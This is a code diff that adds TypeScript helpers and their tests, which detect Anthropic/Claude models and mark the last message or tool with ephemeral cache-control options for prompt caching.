+    expect(isAnthropicModel("claude-3-5-haiku" as never)).toBe(true);
+  });
+
+  it("returns false for non-Anthropic string model ids", () => {
+    expect(isAnthropicModel("openai/gpt-5.2" as never)).toBe(false);
+    expect(isAnthropicModel("google/gemini-3" as never)).toBe(false);
+  });
+
+  it("returns true for a model object whose `provider` is 'anthropic'", () => {
+    expect(isAnthropicModel({ provider: "anthropic", modelId: "claude-haiku-4.5" } as never)).toBe(
+      true,
+    );
+  });
+
+  it("returns true for a model object whose `provider` contains 'anthropic' (gateway-prefixed)", () => {
+    expect(isAnthropicModel({ provider: "gateway.anthropic", modelId: "x" } as never)).toBe(true);
+  });
+
+  it("returns true for a model object whose `modelId` contains 'anthropic' or 'claude'", () => {
+    expect(isAnthropicModel({ provider: "gateway", modelId: "anthropic/x" } as never)).toBe(true);
+    expect(isAnthropicModel({ provider: "gateway", modelId: "claude-x" } as never)).toBe(true);
+  });
+
+  it("returns false for a model object with no anthropic / claude markers", () => {
+    expect(isAnthropicModel({ provider: "openai", modelId: "gpt-5" } as never)).toBe(false);
+  });
+});
diff --git a/lib/agent/contextManagement/addCacheControlToMessages.ts b/lib/agent/contextManagement/addCacheControlToMessages.ts
new file mode 100644
index 000000000..7051998f2
--- /dev/null
+++ b/lib/agent/contextManagement/addCacheControlToMessages.ts
@@ -0,0 +1,44 @@
+import type { JSONValue, LanguageModel, ModelMessage } from "ai";
+import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel";
+
+type ProviderOptions = Record<string, Record<string, JSONValue>>;
+
+const DEFAULT_PROVIDER_OPTIONS: ProviderOptions = {
+  anthropic: { cacheControl: { type: "ephemeral" } },
+};
+
+/**
+ * Mark the LAST message with `cacheControl: { type: "ephemeral" }` so
+ * Anthropic incrementally caches the conversation prefix. Per
+ * Anthropic's docs: "Mark the final block of the final message with
+ * cache_control so the conversation can be incrementally cached."
+ *
+ * Port of open-agents' `addCacheControl({messages, model})` overload
+ * in `packages/agent/context-management/cache-control.ts`.
+ *
+ * For non-Anthropic models the input is returned unchanged. The input
+ * array is not mutated — a new array of message refs is returned.
+ */
+export function addCacheControlToMessages(opts: {
+  messages: ModelMessage[];
+  model: LanguageModel;
+  providerOptions?: ProviderOptions;
+}): ModelMessage[] {
+  const { messages, model, providerOptions = DEFAULT_PROVIDER_OPTIONS } = opts;
+
+  if (!isAnthropicModel(model)) return messages;
+  if (messages.length === 0) return messages;
+
+  const lastIndex = messages.length - 1;
+  return messages.map((message, index) =>
+    index === lastIndex
+      ? {
+          ...message,
+          providerOptions: {
+            ...(message as { providerOptions?: ProviderOptions }).providerOptions,
+            ...providerOptions,
+          },
+        }
+      : message,
+  );
+}
diff --git a/lib/agent/contextManagement/addCacheControlToTools.ts b/lib/agent/contextManagement/addCacheControlToTools.ts
new file mode 100644
index 000000000..2b63cab18
--- /dev/null
+++ b/lib/agent/contextManagement/addCacheControlToTools.ts
@@ -0,0 +1,50 @@
+import type { JSONValue, LanguageModel, ToolSet } from "ai";
+import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel";
+
+type ProviderOptions = Record<string, Record<string, JSONValue>>;
+
+const DEFAULT_PROVIDER_OPTIONS: ProviderOptions = {
+  anthropic: { cacheControl: { type: "ephemeral" } },
+};
+
+/**
+ * Mark the LAST tool in a toolset with `cacheControl: { type: "ephemeral" }`
+ * so Anthropic caches the tool-definitions block across the conversation.
+ *
+ * Port of open-agents' `addCacheControl({tools, model})` overload in
+ * `packages/agent/context-management/cache-control.ts`. Why only the
+ * last tool: Anthropic enforces a max of 4 cache breakpoints, and we
+ * spend one each on the system prompt + messages, so we conserve by
+ * marking just the trailing tool entry (the message's cumulative
+ * cache covers the rest).
+ *
+ * For non-Anthropic models the input is returned unchanged.
+ */
+export function addCacheControlToTools<T extends ToolSet>(opts: {
+  tools: T;
+  model: LanguageModel;
+  providerOptions?: ProviderOptions;
+}): T {
+  const { tools, model, providerOptions = DEFAULT_PROVIDER_OPTIONS } = opts;
+
+  if (!isAnthropicModel(model)) return tools;
+
+  const entries = Object.entries(tools);
+  if (entries.length === 0) return tools;
+
+  const lastIndex = entries.length - 1;
+  return Object.fromEntries(
+    entries.map(([name, t], index) => [
+      name,
+      index === lastIndex
+        ? {
+            ...t,
+            providerOptions: {
+              ...(t as { providerOptions?: ProviderOptions }).providerOptions,
+              ...providerOptions,
+            },
+          }
+        : t,
+    ]),
+  ) as T;
+}
diff --git a/lib/agent/contextManagement/isAnthropicModel.ts b/lib/agent/contextManagement/isAnthropicModel.ts
new file mode 100644
index 000000000..b2442785b
--- /dev/null
+++ b/lib/agent/contextManagement/isAnthropicModel.ts
@@ -0,0 +1,26 @@
+import type { LanguageModel } from "ai";
+
+/**
+ * Predicate: is this a Claude / Anthropic model? Drives whether to
+ * attach `cacheControl: { type: "ephemeral" }` to messages + tools
+ * (Anthropic prompt caching) or leave them untouched.
+ *
+ * Byte-for-byte port of open-agents' `isAnthropicModel`
+ * (`packages/agent/context-management/cache-control.ts`).
+ *
+ * Accepts both string model ids (e.g. `"anthropic/claude-haiku-4.5"`)
+ * and `LanguageModel` instances (e.g. the value returned from
+ * `gateway("anthropic/claude-...")`, which carries `provider` and
+ * `modelId` properties).
+ */
+export function isAnthropicModel(model: LanguageModel): boolean {
+  if (typeof model === "string") {
+    return model.includes("anthropic") || model.includes("claude");
+  }
+  return (
+    model.provider === "anthropic" ||
+    model.provider.includes("anthropic") ||
+    model.modelId.includes("anthropic") ||
+    model.modelId.includes("claude")
+  );
+}